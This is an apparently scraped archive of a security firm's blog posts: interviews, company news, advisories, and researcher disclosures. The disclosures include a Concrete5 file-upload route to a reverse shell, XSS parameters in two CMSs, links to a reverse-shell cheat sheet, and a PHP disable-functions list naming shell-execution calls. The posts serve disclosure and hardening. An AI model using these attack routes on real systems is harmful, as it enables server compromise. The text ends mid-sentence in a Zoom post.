Answers with Troy Hunt Part 3 The Edgescan Team Sent Questions to Troy Hunt (Part 3 of 3)      Troy answers the following questions in this video   Just as traditional login credentials where somewhat reliable before MFA became vital, do you think at some point MFA as we know it would not be enough to secure an application user? If yes, can you think of what the next layer of user authentication mechanism would look like? While developing haveibeenpwned , did the thought ever cross your mind that this could be used as a counterproductive tool, i.e. used in a social engineering attack, obtaining information that could be used for leverage on a person who may be up to no good and forcing them to pay ransom to keep the data safe. Having accounts, they shouldn’t have etc. gambling/ dating sites? What advice would you give to companies like Edgescan to try encourage other organisations to improve their policies around credentials. Should all developers be looking to hook into the haveibeenpawned api? Can a better experience while using MFA (multi-factor authentication) be created especially for non-tech savvy individuals   Be sure to subscribe to the Edgescan Blog.  Watch Part 2 here. Big thanks to Troy for being so generous with his time and to the Edgescan team for coming up with the questions.   Troy Hunt is behind "Have I Been Pwned" and is a Microsoft Regional Director and MVP who travels the world speaking at events and training technology professionals.       ### Edgescan Questions & Answers with Troy Hunt Part 2 The Edgescan Team Sent Questions to Troy Hunt (Part 2 of 3)    Troy answers the following questions in this video   Does being a public figure within the cybersecurity world leave you more exposed as a target to malicious attacks. If so, how do you manage and deal with these? What developments do you see emerging within the field of cybersecurity that will shape the future landscape? Troy's Blog link. What advice do you have for the average internet user to help ensure they safeguard their passwords and data on a daily basis? Without revealing any sensitive information, what’s the most memorable test you’ve performed, and what made it so memorable? Nissan Blog link What do you feel the greatest challenge is, that a Cyber Security professional would face on a regular basis? Home office blog link. Do you feel there are enough efforts being made to make cybersecurity more accessible to younger generations? If not, what might be done in your opinion?   Be sure to subscribe to the Edgescan Blog for the next instalment. Big thanks to Troy for being so generous with his time and to the Edgescan team for coming up with the questions.   Troy Hunt is behind "Have I Been Pwned" and is a Microsoft Regional Director and MVP who travels the world speaking at events and training technology professionals.       ### What’s the Worst that can Happen? An Ode to Risk Edgescan CEO/Founder Eoin Keary shares his blog on Risk Risk a widely used word in many walks of life but do we understand what it means?   “Risk involves uncertainty about the effects/implications of an activity with respect to something that human’s value (such as health, well-being, wealth, property or the environment), often focusing on negative, undesirable consequences.” Cyber security often talks about risk. A high-risk vulnerability or the risk of an event occurring. So, risk is related to statistical occurrence of an event and the negative outcome. We often talk about likelihood and impact. The chance of something happening and the effect the of it happening. As CISOs or cyber security professionals we try to first address items with the highest risk or combination of likelihood and impact; we call this prioritization. The reason we need to prioritize is because we can’t fix all the issues and not every vulnerability is created equal. We all have limited capacity, budget and resources we need to do the best we can with what we have. We try to discover risks via reviews of designs, procedures, technical system reviews and testing. Some of these activities are up-front and others are reoccurring in order to keep pace with change in our environments we control and the environments we don’t control. Keeping pace with risk is hard, we simply don’t have the manpower or budget to focus deeply on all risks to the business. Again, we need to focus on risks which are impactful or have a high chance of occurring. Automation is good for scale and frequency (keeping pace); we can use automation to detect vulnerabilities but its weak at determining actual risk (and alone is prone to false positives). The determination of risk is contextual, based on what the likelihood is, the impact to the systems in question and ultimately the business impact. Automation is not good at context. Risk is all about context. Without context we can’t determine priority. Without priority we can’t focus on what matters to the business. In order to move the cybersecurity dial, improve resilience, detect threats and weakness I believe a combination of automation and human intelligence is required. At Edgescan our mantra is “let’s automate like crazy, but never at the cost of accuracy”. Accuracy is the combination of a few things: No false positives Appropriate risk rating Depth of coverage Combining these aspects results in RELIABLE VULNERABILITY INTELLIGENCE. Vulnerability intelligence is actionable, prioritized and helps focus on what matters. – a core aspect of the Edgescan approach. ### Vulnerabilities Discovered in Concrete5 by Edgescan Researcher This blog post will address recent RCE vulnerability discovered by Edgescan Senior Information Security Consultant, Guram Javakhishvili. These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. These discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application.   Concrete5-8.5.2 Concrete5 CMS is an open source powerful content management system. A point and click, free CMS that creates websites. Concrete5 is used by major brands around the world, such as; GlobalSign, U.S.Army, REC, BASF, and many more, see full list here. Concrete5 is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page.   Issue: concrete5-8.5.2 Remote Code Execution - Reverse Shell Software: concrete5 https://www.concrete5.org/ Vulnerability: Remote Code Execution - Reverse Shell Vulnerable component: File Manager Vulnerability disclosed at: https://hackerone.com/reports/768322 Vulnerable version: 8.5.2 Stable Fixed release: 8.5.4   Remote Code Evaluation (Execution) is a type of application weakness that can be exploited when user input is injected into a file or a String and evaluated by the language's parser. A Remote Code Evaluation is a very serious vulnerability as it is usually easy to exploit and grants full access to an attacker immediately after being exploited. RCE can lead to a full compromise of the susceptible web application and also the web server that it is hosted on. It is important to note that not only PHP language but almost every programming language has code evaluation functions. While there are sites that allow you to run PHP code on demand, they severely limit what you can do and most importantly they thoroughly check your PHP code to eliminate execution of any dangerous functions with high risk, for example: exec, shell_exec. If your application is required to allow PHP extension at least do not pass any user-controlled input (content of the file) inside evaluation functions or callbacks. That includes not letting users decide the name and extensions of files that they wish to upload or create in the web application.   During the assessment of the Concrete5’s version 8.5.2, it was noted that it was possible to modify site configuration to upload the PHP file and execute arbitrary commands.   By default, file types such as PHP, HTML and other dangerous file extensions are not allowed, but it was possible to include PHP extension in the legal file list and then upload the file: https://documentation.concrete5.org/user-guide/editors-reference/dashboard/system-and-maintenance/files/allowed-file-types The attacker needs the appropriate permissions (Admin role) in order to edit and allow other file types (file extension). If the file type such as PHP is added then the user will be able to upload potentially malicious PHP code and execute system commands. A code for the file upload function is located here at \concrete\controllers\backend\file.php which uses handleUpload() upload file and ConcretePermissions() function to check the permitted file extensions, if the file does not exist in the allowed file type list then the exception will be thrown.       Steps to Reproduce Detailed HERE.   Impact Reverse shell is a mechanism that allow attacker to have the server shell by exploiting the web server to trigger a connection back. The attacker would be able to take full control over the web server (system).By executing arbitrary commands on the server, an attacker could compromise the integrity, availability and confidentiality. And pivot onto other servers on the internal network. How to Prevent Remote Code Evaluation File Upload Forms are a major security threat. If your application is required to allow PHP extension at least do not pass any user-controlled input (content of the file) inside evaluation functions or callbacks. That includes not letting users decide the name and extensions of files that they wish to upload or create in the web application. Sanitizing user input is also an option, but this would not be a best solution as it is most of the time not possible due to the number of possible bypasses of restrictions. In this particular case malicious PHP code is injected into a php file or a String and executed (evaluated) by the PHP parser.   Also, you can lock down your interpreter by changing server configuration, if you could limit interpreter functionality to the minimum required for the application to prevent escalation to system command injections. For example, if your application does not use PHP system() function, you can disable that function in your php.ini file by specifying it in the disable_functions directive. Most common list of dangerous functions that you can disable for PHP are: exec(), passthru(), shell_exec(), system(), proc_open(), popen(), curl_exec(), curl_multi_exec(), parse_ini_file(), and show_source().   This bug has already been addressed by Concrete5 and the stable fixed release is out already, version: 8.5.4 Crucially important to keep your installed scripts and CMS platforms up to date. Create a regular schedule to update or patch your CMS, and all installed plugins and themes. Ensure all components are up-to-date. At a minimum weekly update is equally important. Regularly backup the CMS and its underlying database. Subscribe to a regularly-updated list of vulnerabilities for the specific CMS being used. Avoid use of default usernames (e.g., ‘admin’) enforce strong password policy for your CMS’s admin area and server to protect them from the brute force attacks. Use a plugin for strong authentication, or two-factor authentication (2FA) for an additional layer of protection.   “A Remote Code Evaluation can lead to a full compromise of the vulnerable web application and also web server. Nearly 2% of vulnerabilities across the fullstack were attributed to RCE in the Edgescan 2020 Vulnerability Stats Report. At Edgescan, we’re proud of the part we play in identifying vulnerabilities in web apps, alerting vendors and supporting them in making their products as secure as possible. “ Eoin Keary, CEO, Edgescan.   Subscribe to the Edgescan blog to receive updates. Guram Javakhishvili Senior Information Security Consultant Edgescan   ### Edgescan Researcher Discovers Multiple Vulnerabilities in CMS Made Simple and Lime Survey Edgescan Senior Security Consultant Guram Javakhishvili is making an impact in the cybersecurity field as a researcher aka hacker, discovering vulnerabilities across a number of popular applications. Some of which are not yet publicly available, as soon as the vendor implements the fix, those issues will also be added to this list and the blog post will be updated accordingly.   This blog post will address vulnerabilities found in CMS Made Simple and Lime Survey which are already been made available publicly. These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. These discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application.   CMS Made Simple 2.2.13 CMS Made Simple is a Content Management System that was first released in July 2004 as an open source General Public License (GPL) package. It is currently used in both commercial and personal projects. It’s built using PHP and the Smarty Engine, which keeps content, functionality, and templates separated. Guram discovered 5 vulnerabilities in CMS Made Simple 2.2.13. Three are resolved in the latest update 2.2.14 and 2 are outstanding.   1. Reflected Cross-Site Scripting #12224 - CMS Made Simple 2.2.13 Issue: Insufficient validation of user input on the authenticated part of the CMS MadeSimple web application exposes the application to Reflected cross site scripting (XSS) vulnerability. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. List of vulnerable parameter: m1_newdirname Severity: Minor Resolution: Fixed in 2.2.14 Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12224   2. Reflected Cross-Site Scripting #12225 - CMS Made Simple 2.2.13 Issue: Insufficient validation of user input on the authenticated part of the CMS Made Simple web application exposes the application to Reflected cross site scripting (XSS) vulnerability. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. List of vulnerable parameter: m1_name Severity: Minor Resolution: Fixed in 2.2.14 Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12225   3. Stored Cross-Site Scripting #12226 - CMS Made Simple 2.2.13 Issue: Insufficient validation of user input on the authenticated part of the CMS Made Simple web application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. When the content being viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser. List of vulnerable parameters: metadata, pagedata Severity: Critical Resolution: Fixed in 2.2.14 Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12226   4. Stored Cross-Site Scripting #12227 - CMS Made Simple 2.2.13 Issue: These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. When the User/User's Preferences being viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser. List of vulnerable parameters: date_format_string Severity: Minor Resolution: Fixed in 2.2.14 Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12227   5. Stored Cross-Site Scripting #12228 - CMS Made Simple 2.2.13 Issue: These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. When the News being viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser. List of vulnerable parameters: m1_title Severity: Critical Resolution: Fixed in 2.2.14 Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12228     LimeSurvey 3.21.1 LimeSurvey is a free and open source on-line statistical survey web app written in PHP. As a web server-based software it enables users using a web interface to develop and publish on-line surveys, collect responses, create statistics, and export the resulting data to other applications. Guram discovered three vulnerabilities in LimeSurvey 3.21.1 which have been fixed in the latest version 3.21.2.   1. Cross Site Scripting Stored #15680 - LimeSurvey 3.21.1 Issue: LimeSurvey latest version 3.21.1 & LimeSurvey development version 4.0.0 suffer from reflective and persistent (Stored) cross site scripting and html injection vulnerabilities. Insufficient validation of user input on the authenticated part of the Limesurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. List of vulnerable parameters: firstname, lastname Resolution: Fixed in 3.21.2 Detailed description of this bug: https://bugs.limesurvey.org/view.php?id=15680   2. Cross Site Scripting Stored #15681- LimeSurvey 3.21.1 Issue: Insufficient validation of user input on the authenticated part of the Limesurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. List of vulnerable parameters: Quota%5Bname%5D Resolution: Fixed in 3.21.2 Detailed description of this bug: https://bugs.limesurvey.org/view.php?id=15681   3. Cross Site Scripting #15672 - LimeSurvey 3.21.1 Issue: Insufficient validation of user input on the authenticated part of the Limesurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. List of vulnerable parameters: ParticipantAttributeNamesDropdown Resolution: Fixed in 3.21.2 Detailed description of this bug: https://bugs.limesurvey.org/view.php?id=15672   Steps you should take to secure your CMS applications from hacking Crucially important to keep your installed scripts and CMS platforms up to date. Create a regular schedule to update or patch your CMS, and all installed plugins and themes. Ensure all components are up-to-date. At a minimum weekly update is equally important. Regularly backup the CMS and its underlying database. Subscribe to a regularly-updated list of vulnerabilities for the specific CMS being used. Avoid use of default usernames (e.g., ‘admin’) enforce strong password policy for your CMS’s admin area and server to protect them from the brute force attacks. Use a plugin for strong authentication, or two-factor authentication (2FA) for an additional layer of protection. Use another layer of protection (WAF) Web Application Firewall, which automatically protects against all or most of the vulnerabilities. Install security plugins to actively prevent hacking attempts. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. These plugins notify the weaknesses inherent in each platform and halt the hacking attempts that could threaten your application. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. More training and resources available from Edgescan blog post, ‘Secure Application Development Training Material’.     “Cross Site Scripting (XSS) was discovered in 1999 and is massively prevalent across web applications today. Cross site scripting flaws are the most prevalent flaw in web applications today. Over 12% of vulnerabilities across the fullstack were attributed to XSS in the Edgescan 2020 Vulnerability Stats Report. At Edgescan, we’re proud of the part we play in identifying vulnerabilities in web apps, alerting vendors and supporting them in making their products as secure as possible. “Eoin Keary, CEO, Edgescan.   Subscribe to the Edgescan blog to receive updates.   Guram Javakhishvili Senior Information Security Consultant Edgescan Managing API Risks with API Security Testing At Edgescan, we take API security seriously. Our API Security Testing service ensures that your APIs are rigorously tested for vulnerabilities, protecting your integrations and data exchanges. With offices in Dublin and New York, we provide comprehensive security solutions to keep your APIs safe from exploitation. ### Advisory: Critical RCE in Windows DNS - CVE-2020-1350 Windows CVE-2020-1350 aka SIGRed? This blog explains CVE-2020-1350 aka SIGRed, how to identify if you are vulnerable and what, if anything, you need to do. What is it? It’s a vulnerability in all versions of Windows servers that could result in Remote Code Execution, allowing a successful attacker to run unwanted operations on machines which can irreparably damage affected machines by sending a crafted DNS request to the server. The vulnerability has been deemed as ‘wormable’, which means it can be spread between vulnerable machines without user interaction. It can be spread as easily as getting an user to interact with a webpage. Checkpoint have given a breakdown of how the vulnerability may be exploited, as well as how to protect against it. https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ Should I be worried? Yes, this should be patched and the machines restarted at the earliest opportunity. What do I need to do? Edgescan are advising patching at the earliest convenience, when we start seeing SIGRed in the wild on our clients infrastructure, we will be advising them if they are vulnerable. You should also check your patching for Windows Servers: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350 If you can’t immediately apply patches, there is a temporary workaround by editing the maximum length of a DNS message via the registry. https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability Here for CVE advisory: https://nvd.nist.gov/vuln/detail/CVE-2020-1350 Here for the MS Security Response update: https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ If you have any concerns please reach out to the Edgescan Team through the usual channels. ### API Detection and Assessment: What They Don't Tell you in Class... Edgescan CEO/Founder Eoin Keary shares his blog on API Detection and Assessment   API’s  (Application Programming Interfaces) are back-end services  which expose an interface which can be used to connect to and transact or read/write information to and from a back-end system. They are extremely useful and a great architecture decision delivering flexibility and extensibility of a service. APIs deliver functionality once the client service knows how to talk to the API. APIs generally sit behind a HTTP port and can’t be seen unlike a website but they may deliver an equal level of value and functionality to the requesting client.   Many websites may use an API but the user does not invoke the API directly but rather the Website /App is a proxy for the API. APIs are not built to be human readable, like a website, but rather machine readable.   There are two challenges relating to API security assessment:   API Discovery: Do we have an inventory of all APIs deployed on the public Internet? You may have APIs hosted on systems behind HTTP ports but are undiscovered. They may be well known but they may also be old or development deployments which are forgotten about. We can’t secure what we don’t know about.   Adequate assessment involves coverage of entire corporate ranges (CIDR ranges), large lists of IPs, domain names (FQDN’s) and using a multi-layer probing methodology detailed below: API discovery is a combination of both host layer and web layer investigation. Some are easier to discover than others.   Discovering API artefacts: Discovery of APIs may require multiple layers of probing. If we don’t know how to invoke a given API, identification across many levels is required to accurately provide a confidence interval if an API is present or not.   Detection probes (in Edgescan) include:       API Assessment: Keeping pace with change and development.   Assessment of APIs can be difficult as the assessment methodology requires knowledge of how to communicate and invoke the API. Running a simple web scanner against an API simply does not work. A scanner would just hit an initial URL and not know how to invoke or traverse the various API calls.   Good API assessment should have the ability to read/ingest descriptor files in order to understand how to communicate and invoke the API. Once this is done a scanner can assess the API method calls. As the development team alter and change the API, the assessment technology can read the newly updated descriptor file and assess the API including new changes. Keeping pace with change. Assessment of vulnerabilities specific to API’s is also important. Items discussed in the OWASP API Top 10 are an important aspect to true API specific testing.   DevOps: In a DevOps environment the descriptor file can be used to determine change/deltas since the last deployment of the API and only assess the changes saving valuable time in a fast DevOps environment - Iterative testing when frequent change occurs.   For more on Edgescan's API services see:     Eoin Keary CEO/Founder Edgescan http://ekeary.blogspot.com/     Securing APIs with Edgescan At Edgescan, we demystify API security to give you peace of mind. Our API Security Testing ensures complete visibility and protection for your APIs. Operating out of Dublin and New York, we’re your trusted partner for securing the backbone of your digital architecture and cybersecurity. ### Edgescan Receives €10.5M BGF Investment Ireland’s largest growth capital investor, BGF, has invested €10.5 million to acquire a minority stake in Edgescan; one of Ireland’s leading cybersecurity businesses.  This is the fourth investment which BGF has made in an Irish business in the past 17 months.  The combined value of those four investments is over €30 million.   Edgescan was set up  in Dublin in 2011 by Eoin Keary and Rahim Jina.  Eoin Keary is a former vice-chair of OWASP (the Open Web Application Security Project), a  project lead and author. Rahim Jina is a cybersecurity veteran. The company provides continuous cybersecurity intelligence, assessment and services to leading national and international companies.  Last week the company was named as the Best Vulnerability Management Solution provider in the prestigious SC Awards Europe 2020. Edgescan clients include some of the world’s largest entertainment, media, financial services, healthcare and retail companies.  The company employs 57 people in Dublin.   Speaking today, Eoin Keary said; “Having bootstrapped the company to date, we are delighted to have reached this milestone investment from  BGF. We have ambitious plans to aggressively grow Edgescan with a focus on opportunities in North America, the UK and Europe.  We look forward to working closely with Bernie and BGF to fulfil our goals for the business in the coming years.”   Former senior IBM executive Bernie Waldron has joined the Board of Edgescan as independent Non-Executive Chairman.  Mr. Waldron is also investing in the business alongside BGF.  He brings a wealth of experience in scaling high-growth technology businesses internationally.   Bernie Waldron, said; “I’ve been hugely impressed by the differentiated position Edgescan have already carved out in the fast-growing cybersecurity marketplace, with significant overseas business and global blue-chip clients and partners. Eoin and Rahim have also shown themselves to be ambitious and open-minded in their approach to continuing their growth, and I’m looking forward to working closely with them”.   Leo Casey, who heads BGF’s operations in Ireland, will also join the Board with Maedhbh O’Driscoll of BGF joining as a Board observer.   Leo Casey, Head of BGF in Ireland, said; “This is our fourth investment in an Irish business in the past 18 months and the sectors we have invested in range from healthcare to construction to aerospace and now software.  Despite the upheaval caused by Covid 19 we remain very confident about the Irish market and we are looking forward to investing in more ambitious Irish companies over the course of this year.” Edgescan’s proprietary SaaS product continuously detects vulnerabilities across a company’s networks, web applications, API’s and cloud deployments.  The company has enjoyed rapid growth in recent years (software revenues have grown at a compound annual rate of 40% since 2016), reflecting the business-critical nature of the solutions the company provides. The BGF investment will be used for a number of purposes including to accelerate Edgescan’s international expansion and to expedite new product development to continue the company’s strong growth trajectory.   Pictured (l-r) are Eoin Keary and Rahim Jina from Edgescan with Maedbh O’Driscoll and Leo Casey from BGF. Photograph: Fennell Photography.   Dublin 7/06/2020 ### Edgescan's Emma Heffernan runner up in SC Awards Europe Cybersecurity Student of the Year Three for three at the SC Awards Europe for Edgescan as Edgecan Analyst, Emma Heffernan receives runner-up in her category.  The SC Awards Europe took place virtually this year on the 2nd, 3rd and 4th of June, to showcase the amazing work and teams from the cybersecurity industry in Europe.   Edgescan was shortlisted for both Best Vulnerability Management Solution AND Best Enterprise Security Solution.  The good news too is that Edgescan Security Analyst, Emma Heffernan was shortlisted for Cybersecurity Student of the Year.   Edgescan was announced as winner of Best Vulnerability Management Solution 2020 on Wednesday and on Thursday Edgescan received the Highly Commended accolade in the Best Enterprise Security Solution category. To finish up on a high, Edgescan Security Analyst, Emma Heffernan was named Highly Commended in the Cybersecurity Student of the Year category.   SC Awards Europe 2020 Our highly commended award had a “Very creative entry!” with one judge commenting how she, “especially liked the video which made judging her entry more fun,” while another noted the entrant was “ really going above and beyond to increase her skills and knowledge.” Emma Heffernan is studying a BSc in Computing in digital forensics and cyber security at TU Dublin where she is a student ambassador for the university. She founded the Irish Humans of Cyber Network, an organisation for students & industry professionals or those looking to change their career. Heffernan is a mentor to children in the local CoderDojo, participating in the STEM Aspire Mentoring programme with Dell EMC inspiring female students how STEM subjects open opportunities in the tech sector, and a member of OWASP. She is a regular on the Capture the Flag events and has represented Ireland at international competitions including the European Cyber Security Challenge, and also speaks at conferences including addressing the IRISSCERT Cyber Crime Conference attended by nearly 400 people.   Emma remarked, "I'd like to thank everyone who has supported me over the last year in building my career, especially the team at Edgescan. Being shortlisted and awarded 'highly commended' at this years SC Awards Europe was an honour. This is just the beginning, there'll be much more to come!" Congratulations Emma, you've a bright future ahead.     ### SC Awards Europe Best Enterprise Security Solution - Edgescan Highly Commended The SC Awards Europe took place virtually this year on the 2nd, 3rd and 4th of June, to showcase the amazing work and teams from the cybersecurity industry in Europe.   Edgescan was shortlisted for both Best Vulnerability Management Solution AND Best Enterprise Security Solution.  Good news too that Edgescan Security Analyst, Emma Heffernan was shortlisted for Cybersecurity Student of the Year.   Edgescan was announced as winner of Best Vulnerability Management Solution 2020 on Wednesday and on Thursday Edgescan received the Highly Commended accolade in the Best Enterprise Security Solution category.   Edgescan impressed the judging panel.   Our judges said, “A great example of a comprehensive vulnerability management system with excellent reporting capabilities,” concluding, “Really great submission, good use of images to sell the story.”   Edgescan delivers a managed service which detects and helps defend clients from cyber-attacks on a continuous basis. The platform is a highly scalable SaaS solution that offers users a blend of sensible metrics, ease of use and filtering tools within the client’s secure web portal that makes it easy, even with a large amount of data, to view the most important cyber-risks facing them. The Edgescan dashboard is updated upon the completion of every assessment and available 24/7.       ### Edgescan Wins Best Vulnerability Management Solution at SC Awards Europe The SC Awards Europe takes place virtually this year on the 2nd, 3rd and 4th of June, to showcase the amazing work and teams from the cybersecurity industry in Europe. Edgescan have been shortlisted for both Best Vulnerability Management Solution AND Best Enterprise Security Solution.  Good news too that Edgescan Security Analyst, Emma Heffernan has been shortlisted for Cybersecurity Student of the Year. Edgescan Fullstack Vulnerability Management was described by the judges as a “Good all-rounder,” and “A highly scalable SaaS solution with good TCO, collaboration across other tools. A strong solution,” concluding it is a: “Valuable product that addresses major external threats and adds human context.” Edgescan CEO, Eoin Keary accepted the award for Edgescan and sent in his acceptance speech. Delighted to be honoured with such an award as recognition of our service, platform, clients and people”. Eoin Keary, CEO, Edgescan. SC Awards Europe 2020 - Day 3 Day 3 of the SC Awards Europe 2020 shows on Thursday 4th June. Edgescan is up for Best Enterprise Security Solution and Edgescan Security Analyst, Emma Heffernan is up for Cybersecurity Student of the Year. Fingers crossed! UPDATE! Edgescan received a Highly Commended nod for both Best Enterprise Security Solution and for Emma as Cybersecurity Student of the Year! ### Technical data sheet Edgescan ### Webinar - Edgescan Workshop with TUDublin Edgescan TUDublin Webinar 27th April 2020   Student Webinar including presentations from Edgescan experts. Ciaran - Working in Edgescan (00:00) Dearbhail - 2020 Edgescan Stats Report Insights (00:22) Conor - HTB Demo (00:41) Resources: https://gtfobins.github.io/ https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://www.exploit-db.com/exploits/47837 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://portswigger.net/web-security -Burp Academy for web testing https://owasp.org/www-project-juice-shop/ for testing and learning, generally any of the OWASP resources. https://www.ecollege.ie - Free resources   Edgescan Careers & Internships   Any questions about this webinar, contact jan@edgescan.com       Keep up to date with future presentations on the Edgescan Events & Webinars page. ### PFH Announced as an Edgescan Partner PFH Technology Group and Edgescan have united to create a partnership to further strengthen their ICT Solutions and Security portfolio. The constant and real threat of cyber-attacks warrants customers to ensure that the best is being done to secure their data and business at all times. This means ensuring that your data is secure, available and has full integrity with no margin for error 24x7x365. PFH are renowned for delivering best-in-class ICT customer-centric solutions and managed services for over 30 years with over 450 staff and 1500 customers nationwide. Covering everything from desktop to datacentre and cloud, PFH are industry leaders of supplying full end to end solutions which are built with security by design. Full stack Vulnerability services require specialised security skillsets, regular iterations and more importantly a service that can react accordingly by planning and implementing fixes. As such PFH have chosen the global and award-winning vulnerability leaders Edgescan, who have local expertise to work alongside PFH Technology Groups Network Operations Centre and solution design teams. This partnership adds another layer of security to PFH’s Managed Services portfolio and further strengthens PFH’s position as the number one privately-owned ICT company in the marketplace. This gives our customers peace of mind when it comes to detecting security weaknesses which may result in a breach, reputation damage or loss of revenue. Gerard Kirrane, Cyber Security Solutions Lead at PFH, explains how this has proven to be an attractive and relevant service in the Irish marketplace “It is no longer a time where companies can stick their head in the sand about the real threats that occur today. Everyone is a target. As ICT is becoming more advanced and in some ways more complex, our clients are looking for a fewer number of partners and vendors to deal with in order to try and reduce complexity and costs. Having Edgescan as part of our managed services portfolio allows us to build in security services by design that is being delivered with a best of breed approach while maintaining clear separation of duties allowing the experts to do what they do best.” Eoin Keary, CEO at Edgescan stated “We are excited to be working with PFH in expanding the range of services offered to their national and international clients. We’re proud to partner with an Ireland based company and support them in their continued success.” PFH Technology Group and Edgescan partnerships will now allow for: Continuous Vulnerability Management keeps pace with constant changes to the customers environment. As new cybersecurity issues are made public Edgescan helps detect if a customer is vulnerable resulting in continuous vulnerability intelligence and PFH are there to assist with understanding the risk and remediations required around it. API Security Testing provides continuous security testing for the ever-growing world of APIs. APIs are becoming ever more popular given the explosive growth in mobile apps. Penetration Testing Services provides both manual consultant-based penetration testing and deep security testing via our Edgescan Advanced License. Edgescan is CREST Accredited as meeting the strict criteria set down for providing an expert Penetration Testing service. Join us on our webinar on Wednesday 6th May 2020 Gerard Kirrane, Cyber Security Solutions Lead at PFH and Eoin Keary, CEO at Edgescan will provide an overview of Edgescan’s award-winning technology and how it can further protect organisations. ### Edgescan Shortlisted Twice for SC Awards. Fantastic News - Edgescan a Finalist in the SC Awards Europe 2020 in Two Categories Edgescan has been shortlisted in the SC Awards Europe 2020 in the categories of Best Vulnerability Management Solution and Best Enterprise Security Solution.   In addition, Edgescan Security Analyst, Emma Heffernan, has been nominated as Best Cyber Security Student of the Year 2020. Congratulations Emma!   The SC Awards Europe usually take place in London, in the run up to the InfoSecurity Europe Conference in June.  Due to Covid-19, these events are going virtual so instead of one night of partying, the SC Awards will run over a number of days.   We can't wait to see what the SC Awards team have planned.   Edgescan is an award-winning solution and we hope to add to the collection at the SC Awards 2020.     ### Calm Down - In Defence of Zoom. Edgescan's Senior Security Consultant, Guram Javakhishvili, gives his take on the Zoom debacle. Guram stresses that he is not 'sponsored by Zoom' 😊.   First of all, nothing is bulletproof and anything can be hacked. We all make mistakes and learn from them. That’s how and why we improve and update software on a regular basis.   Question is: on what basis are other blog posters or researchers assuming that there’s RCE, UNC Path Injection, weak or no E2E encryption and many other vulnerabilities which have been mentioned over the past few weeks? If they have been testing or targeting Zoom systems in its production environment without penetration testing authorisation then that is illegal and unethical. I believe most of these blog posts are just repeating unethical researchers unauthorised publications.   A brief clarification on a few of the vulnerabilities recently posted and my personal thoughts on them:   Zoom video recordings accessible to the public This is a user issue. There is an option within the Zoom admin panel where you can set video records to be private, public or only accessible by call participants. If you are not aware of current settings, better check before recording. If recording is set to 'Public' then anyone with access to the link will be able to see the video content. By default, users tend to leave 'Public' enabled and then if they post the link somewhere or even access the link through the shared browser (since the encrypted key of the video record is contained in URL) it will stay in browser history and whoever has access to the machine will be able to access it.   Zoom bombing (attackers can brute force ID and Password) Even if you had valid password and ID, you still start a call in a 'waiting room' until host admits you. You can basically do nothing in the waiting room, and there is no way you can bypass until the host admits you to the meeting. Also, I’m not too sure about brute-forcing since Zoom uses WAF protection Cloudflare. This needs a little bit of tuning (I would have thought, Zoom allowed multiple failed login attempts without blocking joiners, since participants might get password or id wrong) but again this can be enhanced from admin panel if one is familiar with the settings. Again, user awareness - choose to use complex passwords, you can always set this yourself if you wanted to be safe.   UNC Path Injection UNC Path is possible with other modern applications too, not just Zoom. MS Outlook does also allow UNC Path as hyperlink. So what? We have never abandoned Outlook for this. Nevertheless, Zoom already addressed this and latest release does not allow UNC Path anymore.   Zoom does not support E2E Encryption Zoom acknowledges encryption problems and they proactively worked on this to address E2E encryption issues. Zoom indeed always supported TLSv1.2 for all its communications but there was a weak cryptographic cipher. A single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption. It should be mentioned that even if third-party deliberately disables E2E encryption and initiates a meeting but then if guest joins with E2E encryption enabled then this feature gets enforced and communication for both parties become encrypted.   Inconsistent Application of Security Policy Advice to Zoom team and Zoom users on anomalies with file sharing, recording and, screenshare and remote controlling:   File Sharing File share can be disabled from Zoom admin panel and people from your organisation will not be able to transfer files during Zoom chat/meetings. However, if a third-party host has this function enabled, it is possible to send files to all participant users (guests). If participants have file share disabled by their Admin and they can't send files, they will still be able to receive and download files from third-party host, which increases the risk of being sent malware or other malicious files.   Recording If the Recording feature is disabled from your organisation's Zoom Admin, and someone from your organisation is hosting a meeting, the recording feature will not be available for any party, including 